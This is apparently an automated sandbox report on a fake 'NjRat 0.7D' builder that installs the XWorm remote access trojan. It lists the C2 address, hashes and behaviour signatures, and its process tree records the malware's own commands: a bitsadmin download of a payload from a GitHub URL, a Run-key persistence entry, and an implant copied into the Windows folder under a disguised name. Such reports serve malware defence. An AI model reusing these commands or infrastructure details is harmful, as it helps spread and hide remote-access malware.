Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-08-2024 10:24

General

  • Target

    NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe

  • Size

    8.9MB

  • MD5

    3e8dc9ba82863bd3c1e5ec769d2c187f

  • SHA1

    fa80a09b2a6804868c26dbeb62b073d1546a132b

  • SHA256

    6f4fb430fc36355253eff73a164d147ad1fa17dc9c62dba0984d003e1db74880

  • SHA512

    10e375f93a01925833c3199889afe889f8f83422a4aee8b21cddda65f5436184693d7156b9ae46be1fc25ef886d07af5fe9db15c297b7e58d8faea965151234c

  • SSDEEP

    196608:pG2cZZTlJT3BGzYRR/x8i1hDs79+wPUy07BtOxmgVfMpobGHCWhyn:82cXTlJT37RRKi1169+xy0DOxHVf7bGm

Malware Config

Extracted

Family

xworm

C2

83.143.112.30:3096

Mutex

Dza3YLL2q2qcgzdH

aes.plain

Signatures

  • Detect Xworm Payload 5 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe
    "C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:784
    • C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe
      "C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2440
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\System32\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority normal https://raw.githubusercontent.com/BlackAll9/rrr/main/MicrosoftEdge.rar C:\Users\Admin\AppData\Roaming\MicrosoftEdge.rar
        3⤵
        • Download via BitsAdmin
        PID:2696
    • C:\Users\Admin\AppData\Roaming\audiodg.exe
      "C:\Users\Admin\AppData\Roaming\audiodg.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3060
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 8
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2708
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:2100
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\Users\Admin\AppData\Roaming\audiodg.exe" "C:\Windows\Isolation graphique de périphérique audio Windows .exe" && ping 127.0.0.1 -n 13 > nul && "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1160
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 13
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2576
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 13
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2000
        • C:\Windows\Isolation graphique de périphérique audio Windows .exe
          "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1944
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious use of AdjustPrivilegeToken
            PID:496
          • C:\Users\Admin\AppData\Local\Temp\WatchDog.exe
            "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2316
            • C:\Users\Admin\AppData\Local\Temp\WatchDog.exe
              "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1728

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe

    Filesize

    8.5MB

    MD5

    70ea9c044c9a766330d3fe77418244a5

    SHA1

    18602d0db52917b88cbdab84ba89181e6fd4686a

    SHA256

    b78fb092e151db613cba51d7f2532547e48c6f4712809a485f272e2ab55776a5

    SHA512

    5261865e7ca21e928b956a97518366c9dc218a2312961e0ba0b72b37ae7c797176382de3c3dc1d2949aca51c3db330562f1087a71efdc7c3c3b8f8928872f917

  • C:\Users\Admin\AppData\Local\Temp\WatchDog.txt

    Filesize

    78B

    MD5

    d8d402e89dfd0d68ef74f1e5eb908783

    SHA1

    f1316ea2a1ab57d60c3778dd568f558842a0ad59

    SHA256

    9d5cc20e40bddf63d32620611667ddc3d9cbfacc5a4f10aeddc533822a0819cd

    SHA512

    790e8d9b23ff6981e4e7fed1ea5cd18aab23ce8ac731c974df88d2e433d27331f28e12a187cf114ddbaf513acea3c4cb1a2dbfa1ed226a884b707915adf894b4

  • C:\Users\Admin\AppData\Local\Temp\WatchDog.txt

    Filesize

    81B

    MD5

    aa2ba3f6b3c72fb0d31377de02638170

    SHA1

    a2eb4f466a4b312c014c39cd7537b3da6f113561

    SHA256

    4b9e8ff63430de858de9fc7e51f32500b6f7c235fea9de777481ef590eafb607

    SHA512

    e5665bbf169432c1128149fbcd831ea9e27185be32c4548e919d66e4f642f0ca11ce29d2d6aa3cfe3c55420d159b47db483115f0e99ee2379e9904f7f1f163df

  • C:\Users\Admin\AppData\Roaming\audiodg.exe

    Filesize

    355KB

    MD5

    d9dfa8ba182529445890b5021e159b77

    SHA1

    64f8724f8cd76adff12364e6bb2fc9eaceadb1ba

    SHA256

    60df809a613aab714e2edad3338500a081fbae866cee3a4a3113abed60f5d59f

    SHA512

    d18f5d13d5ea4226e309fe7d5b59eac5770f391b92c5a03e0f14cd5e23a45b75ed2353e7a388198162061686d9c4675e11428d0362a01b7e05a0b4638fb10803

  • C:\Users\Admin\AppData\Roaming\install.vbs

    Filesize

    19KB

    MD5

    4724c9dce57bc0472ed610ba16d08894

    SHA1

    d5fea3520146ccbf54c31b3b4868de499022fb37

    SHA256

    aaf7bddca268a157d995df03454ba4d15df36c6b717ebc7fb018e3c5101ef2fb

    SHA512

    d1ec126257698cecfcebf3db17c910b33a231d08d955a4659ed417e1c115976506e1bd55db463c0e1414e39e6f90f11b20ab2110048bd947e51d9473db292b18

  • \Users\Admin\AppData\Local\Temp\WatchDog.exe

    Filesize

    76KB

    MD5

    0e362e7005823d0bec3719b902ed6d62

    SHA1

    590d860b909804349e0cdc2f1662b37bd62f7463

    SHA256

    2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad

    SHA512

    518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3

  • memory/496-41-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/496-42-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-43-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-44-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-39-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-37-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-35-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-34-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/784-0-0x000007FEF50B3000-0x000007FEF50B4000-memory.dmp

    Filesize

    4KB

  • memory/784-18-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp

    Filesize

    9.9MB

  • memory/784-2-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp

    Filesize

    9.9MB

  • memory/784-1-0x00000000013C0000-0x0000000001CB8000-memory.dmp

    Filesize

    9.0MB

  • memory/1944-32-0x0000000000610000-0x0000000000616000-memory.dmp

    Filesize

    24KB

  • memory/1944-31-0x00000000004E0000-0x00000000004FA000-memory.dmp

    Filesize

    104KB

  • memory/1944-30-0x0000000000300000-0x000000000035E000-memory.dmp

    Filesize

    376KB

  • memory/2316-53-0x0000000001140000-0x000000000115A000-memory.dmp

    Filesize

    104KB

  • memory/2440-25-0x0000000000F20000-0x0000000000F60000-memory.dmp

    Filesize

    256KB

  • memory/2440-20-0x0000000000F20000-0x0000000000F60000-memory.dmp

    Filesize

    256KB

  • memory/3060-22-0x0000000000860000-0x00000000008A2000-memory.dmp

    Filesize

    264KB

  • memory/3060-21-0x0000000000910000-0x000000000096E000-memory.dmp

    Filesize

    376KB